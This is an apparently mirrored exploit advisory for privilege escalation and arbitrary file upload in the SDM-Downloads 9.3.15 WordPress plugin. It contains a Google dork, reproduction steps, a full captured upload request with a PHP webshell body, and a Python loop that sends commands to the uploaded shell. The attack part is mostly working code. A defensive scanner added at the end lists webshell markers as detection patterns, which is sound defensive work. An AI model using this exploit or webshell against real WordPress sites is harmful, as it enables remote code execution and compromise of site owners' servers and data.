SDM-Downloads 9.3.15 Privilege Escalation Arbitrary File Upload

CVE: CVE-XXXX-XXXX
Category: CWE-XXX
Price: Unknown
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2023-01-06
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023010008

Below is a copy:

SDM-Downloads 9.3.15 Privilege Escalation Arbitrary File Upload
# Exploit Title: Arbitrary File Upload - Privilege Escalation: an Editor can bypass the allowed-extension check, which can lead to RCE
# Google Dork: inurl:/sdm-downloads/
# Date: 04/01/2023
# Exploit Author: Luth1er
# Vendor Homepage: https://simple-download-monitor.com/
# Software Link: https://downloads.wordpress.org/plugin/simple-download-monitor.zip
# Version: 9.3.15

A user with the Editor role can bypass the extension allow-list enforced by the plugin and upload PHP shell code.

Steps to reproduce:

1 - Log in to the Editor account.
2 - Go to "Add New" under sdm-downloads posts.
3 - Go to the downloadable file field, open Burp Suite and capture the upload request.
4 - Choose your PHP webshell, then change the file header to HTML in the request, as in the capture below.

POST http://localhost/wp-admin/async-upload.php
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Content-Length: 822
Content-Type: multipart/form-data; boundary=---------------------------42010083933333799326780521202
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=luth1er%7C1672966581%7C9irtxcxkQw5MdB1z22zzRoTcrJa9GZhlUSFI3vxkpX6%7C5250a3994bfb10de1601bbc2243e838191e8ff24b815a9875190bc8b23837d99; wp-settings-1=libraryContent%3Dbrowse%26urlbutton%3Dfile%26align%3Dcenter%26editor%3Dtinymce%26mfold%3Do; wp-settings-time-1=1672804801; wp_wpfileupload_86a9106ae65537651a8e456835b316ab=f8M5gaey5s2Y9AbpOheTm1ymwc9Waqta; PHPSESSID=002lmr7b4084cao099npqhspnb; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=luth1er%7C1672966581%7C9irtxcxkQw5MdB1z22zzRoTcrJa9GZhlUSFI3vxkpX6%7C08158594f72785ab694bfe58473e905d74d352ff23956c602fd739eff55fbd0b; wp_lang=en_US
Host: localhost
Origin: http://localhost
Referer: http://localhost/wp-admin/post.php?post=145&action=edit
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0

-----------------------------42010083933333799326780521202
Content-Disposition: form-data; name="name"

webshell.html
-----------------------------42010083933333799326780521202
Content-Disposition: form-data; name="action"

upload-attachment
-----------------------------42010083933333799326780521202
Content-Disposition: form-data; name="_wpnonce"

bdc1866b26
-----------------------------42010083933333799326780521202
Content-Disposition: form-data; name="auto_watermark"

1
-----------------------------42010083933333799326780521202
Content-Disposition: form-data; name="async-upload"; filename="webshell.html"
Content-Type: text/html

<html>
<?php

$command = $_GET['cmd'];
$command = shell_exec($command);
echo $command;

?>
</html>

-----------------------------42010083933333799326780521202--

import requests
import sys, os

os.system('clear')

banner  = """
                 /$$                             /$$                                   /$$                           /$$          
                | $$                            | $$                                  | $$                          | $$          
  /$$$$$$$  /$$$$$$$ /$$$$$$/$$$$           /$$$$$$$  /$$$$$$  /$$  /$$  /$$ /$$$$$$$ | $$  /$$$$$$   /$$$$$$   /$$$$$$$  /$$$$$$$
 /$$_____/ /$$__  $$| $$_  $$_  $$ /$$$$$$ /$$__  $$ /$$__  $$| $$ | $$ | $$| $$__  $$| $$ /$$__  $$ |____  $$ /$$__  $$ /$$_____/
|  $$$$$$ | $$  | $$| $$ \ $$ \ $$|______/| $$  | $$| $$  \ $$| $$ | $$ | $$| $$  \ $$| $$| $$  \ $$  /$$$$$$$| $$  | $$|  $$$$$$ 
 \____  $$| $$  | $$| $$ | $$ | $$        | $$  | $$| $$  | $$| $$ | $$ | $$| $$  | $$| $$| $$  | $$ /$$__  $$| $$  | $$ \____  $$
 /$$$$$$$/|  $$$$$$$| $$ | $$ | $$        |  $$$$$$$|  $$$$$$/|  $$$$$/$$$$/| $$  | $$| $$|  $$$$$$/|  $$$$$$$|  $$$$$$$ /$$$$$$$/
|_______/  \_______/|__/ |__/ |__/         \_______/ \______/  \_____/\___/ |__/  |__/|__/ \______/  \_______/ \_______/|_______/ 

                                                Version: 9.3.15
                                        Privilege escalation: WebShell
"""
print(banner)
# Interactive loop: each entered payload is sent as the cmd query parameter to the uploaded file.
while True:
    exec_payload = input("[+] Payload: ")
    print('')
    if exec_payload == 'exit':
        break
    if exec_payload == 'clear':
        os.system('clear')
    else:
        response = requests.get('http://localhost/wp-content/uploads/2023/01/alert.html?cmd=' + exec_payload)
        print(response.text)
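Added defender-side example, not part of the advisory above: a scan of a WordPress uploads directory that flags files whose content carries PHP code even though their extension is not .php, which is exactly the artifact the captured request creates (a .html file declared as text/html with a PHP body). The marker lists, the default path and the sample files are assumptions made for this example.

```python
import re
from pathlib import Path

# Byte patterns that identify PHP code regardless of file extension or declared MIME type.
PHP_OPEN_TAGS = (b"<?php", b"<?=")
# Command-execution calls commonly found in webshells (assumed list, not exhaustive).
SHELL_MARKERS = re.compile(rb"(shell_exec|system|passthru|exec|eval)\s*\(", re.IGNORECASE)
# Request-controlled input feeding those calls, e.g. $_GET['cmd'] in the advisory's payload.
REQUEST_INPUT = re.compile(rb"\$_(GET|POST|REQUEST|COOKIE)\s*\[")


def classify_bytes(data: bytes) -> list[str]:
    """Return the reasons a file's content looks like embedded PHP code (empty if clean)."""
    reasons = []
    if any(tag in data for tag in PHP_OPEN_TAGS):
        reasons.append("php-open-tag")
    if SHELL_MARKERS.search(data):
        reasons.append("command-execution-call")
    if REQUEST_INPUT.search(data):
        reasons.append("request-controlled-input")
    return reasons


def scan_uploads(root: str, max_bytes: int = 1_000_000) -> list[tuple[str, list[str]]]:
    """Walk an uploads tree and report non-.php files whose content contains PHP code.

    Files that legitimately end in .php are skipped: the polyglot case is a PHP body
    hidden behind an allowed extension such as .html or an image type.
    """
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() in (".php", ".phtml"):
            continue
        with path.open("rb") as fh:
            data = fh.read(max_bytes)  # cap the read so large media files stay cheap to scan
        reasons = classify_bytes(data)
        if reasons:
            findings.append((str(path.relative_to(root)), reasons))
    return findings


if __name__ == "__main__":
    import sys
    # Default path is an assumption; pass the real uploads directory as the first argument.
    for rel, why in scan_uploads(sys.argv[1] if len(sys.argv) > 1 else "wp-content/uploads"):
        print(f"{rel}: {', '.join(why)}")
```

The same classify_bytes check can be applied to the raw upload body before it is written to disk, so that a mismatch between the declared type and the actual content is rejected instead of merely found later.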